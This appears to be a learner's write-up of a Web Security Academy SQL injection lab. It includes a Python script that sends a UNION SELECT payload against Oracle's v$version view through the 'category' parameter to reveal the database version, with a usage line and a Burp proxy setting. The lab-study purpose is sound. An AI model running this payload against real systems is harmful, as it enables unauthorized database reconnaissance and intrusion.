This lab helped me understand how SQL injection can go beyond simple login bypass or data leakage. By using a UNION SELECT injection, I was able to query internal database metadata — specifically from Oracle's v$version view — to determine the database type and version. This kind of information is crucial during real-world exploitation and recon, as it allows attackers to tailor further payloads to the specific DBMS.
[+] Start Burp Suite before running the script — it uses a proxy for visibility.
[+] The input in the category parameter is injectable.
[+] A UNION SELECT query is used to fetch database version details.
[+] Oracle-specific view v$version reveals DB type and version.
[+] The script checks for a success message in the response.
[+] This confirms that the query executed and data was retrieved.
python3 exploit.py https://<your-lab-id>.web-security-academy.net
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def exploit_sqli(url, payload):
uri = '/filter?category='
r = requests.get(url + uri + payload, verify=False, proxies=proxies)
if "Congratulations" in r.text:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = "'UNION+SELECT+BANNER,BANNER+FROM+v$version--"
except IndexError:
print("[-] Usage: %s <url>" %sys.argv[0])
print('[-] Example: %s www.example.com ' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url, payload):
print("[+] SQL injection successful!")
else:
print("[-] SQL injection unsuccessful")